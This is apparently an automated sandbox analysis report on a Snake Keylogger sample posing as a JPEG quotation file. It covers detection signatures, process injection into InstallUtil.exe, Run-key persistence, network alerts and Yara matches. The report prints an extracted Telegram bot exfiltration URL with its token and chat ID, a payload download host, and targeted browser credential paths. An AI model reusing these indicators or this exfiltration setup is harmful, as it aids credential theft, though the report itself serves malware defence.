Windows Analysis Report
RFQ____RM quotation_JPEG IMAGE.img.exe

Overview

General Information

Sample name: RFQ____RM quotation_JPEG IMAGE.img.exe
Analysis ID: 1519289
MD5: c3490999b5e36705b9b2abb2a3ed08c1
SHA1: f6af8f800b5e86d12ea5a1a5567da493d0c816b3
SHA256: 8f2dd3233b7b97265bcdfc1053875652d9f9012d3716de034f73b5caadd78d7b
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ____RM quotation_JPEG IMAGE.img.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe" MD5: C3490999B5E36705B9B2ABB2A3ED08C1)
    • InstallUtil.exe (PID: 5500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Gydvapkca.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Roaming\Gydvapkca.exe" MD5: C3490999B5E36705B9B2ABB2A3ED08C1)
    • InstallUtil.exe (PID: 3176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Gydvapkca.exe (PID: 6716 cmdline: "C:\Users\user\AppData\Roaming\Gydvapkca.exe" MD5: C3490999B5E36705B9B2ABB2A3ED08C1)
    • InstallUtil.exe (PID: 5780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE/sendMessage?chat_id=5726609491", "Token": "7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE", "Chat_id": "5726609491", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen |
  • 0x1999c:$x1: $%SMTPDV$
  • 0x19944:$x3: %FTPDV$
  • 0x19968:$m2: Clipboard Logs ID
  • 0x19ba6:$m2: Screenshot Logs ID
  • 0x19cb6:$m2: keystroke Logs ID
  • 0x19f90:$m3: SnakePW
  • 0x19b7e:$m4: \SnakeKeylogger\
00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |

Source | Rule | Description | Author | Strings
6.2.Gydvapkca.exe.3efb240.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x12c9d:$a1: get_encryptedPassword
  • 0x12f89:$a2: get_encryptedUsername
  • 0x12aa9:$a3: get_timePasswordChanged
  • 0x12ba4:$a4: get_passwordField
  • 0x12cb3:$a5: set_encryptedPassword
  • 0x14327:$a7: get_logins
  • 0x1428a:$a10: KeyLoggerEventArgs
  • 0x13ef5:$a11: KeyLoggerEventArgsEventHandler
0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x1a622:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x19854:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19c87:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1acc6:$a5: \Kometa\User Data\Default\Login Data

                System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Gydvapkca.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, ProcessId: 3148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gydvapkca
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T09:57:59.328439+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
2024-09-26T09:58:12.351328+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49712 | TCP
2024-09-26T09:58:20.390717+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49732 | TCP
2024-09-26T09:57:59.328439+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
2024-09-26T09:58:12.351328+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49712 | TCP
2024-09-26T09:58:20.390717+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49732 | TCP
2024-09-26T09:58:04.501438+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:07.546643+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:18.647214+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:19.659022+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:26.236139+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:36.205264+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49755 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:38.967275+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49757 | 188.114.96.3 | 443 | TCP
2024-09-26T09:58:02.914824+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:03.945997+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:06.961661+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:17.258472+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49719 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:18.086608+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49719 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:19.383486+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49729 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:24.789748+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:25.696094+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | TCP
2024-09-26T09:58:27.196006+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | TCP

                AV Detection

Source: RFQ____RM quotation_JPEG IMAGE.img.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe | Avira: detection malicious, Label: HEUR/AGEN.1323682
Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE/sendMessage?chat_id=5726609491", "Token": "7898897232:AAH4QekZK0wf1eNHt5yAECTe9huaiVIg5vE", "Chat_id": "5726609491", "Version": "5.1"}
Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe | ReversingLabs: Detection: 63%
Source: RFQ____RM quotation_JPEG IMAGE.img.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe | Joe Sandbox ML: detected
Source: RFQ____RM quotation_JPEG IMAGE.img.exe | Joe Sandbox ML: detected

                Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: RFQ____RM quotation_JPEG IMAGE.img.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49742 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: RFQ____RM quotation_JPEG IMAGE.img.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06001A38h7_2_06001966
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600F461h7_2_0600F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0600C499h7_2_0600C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06038945h7_2_06038608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06030741h7_2_06030498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060358C1h7_2_06035618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06035D19h7_2_06035A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06036171h7_2_06035EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060336CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060365C9h7_2_06036320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06036A21h7_2_06036778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060333A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060333B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06036E79h7_2_06036BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060302E9h7_2_06030040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 060372FAh7_2_06037050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06037751h7_2_060374A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06030B99h7_2_060308F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06037BA9h7_2_06037900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06030FF1h7_2_06030D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06038001h7_2_06037D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06035441h7_2_06035198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06038459h7_2_060381B0

                Networking

                Source: Network traffic | Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49704
                Source: Network traffic | Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49704
                Source: Network traffic | Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49712
                Source: Network traffic | Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49712
                Source: Network traffic | Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49732
                Source: Network traffic | Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49732
                Source: Yara match | File source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE
                Source: global traffic | HTTP traffic detected: GET /panel/Skdqhzzwa.mp3 HTTP/1.1 | Host: wymascensores.com | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
                Source: Joe Sandbox View | IP Address: 67.212.175.162
                Source: Joe Sandbox View | IP Address: 188.114.96.3
                Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknown | DNS query: name: checkip.dyndns.org
                Source: unknown | DNS query: name: reallyfreegeoip.org
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 158.101.44.242:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 158.101.44.242:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49746 -> 158.101.44.242:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 158.101.44.242:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 158.101.44.242:80
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49757 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49755 -> 188.114.96.3:443
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49742 version: TLS 1.0
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | DNS traffic detected: DNS query: wymascensores.com
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: InstallUtil.exe | String found in binary or memory: http://checkip.dyndns.com
                Source: InstallUtil.exe | String found in binary or memory: http://checkip.dyndns.org
                Source: InstallUtil.exe | String found in binary or memory: http://checkip.dyndns.org/
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, Gydvapkca.exe, InstallUtil.exe | String found in binary or memory: http://checkip.dyndns.org/q
                Source: InstallUtil.exe | String found in binary or memory: http://checkip.dyndns.orgh
                Source: InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
00000007.00000002.4525996681.0000000002A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003251000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.000000000261D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000004015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
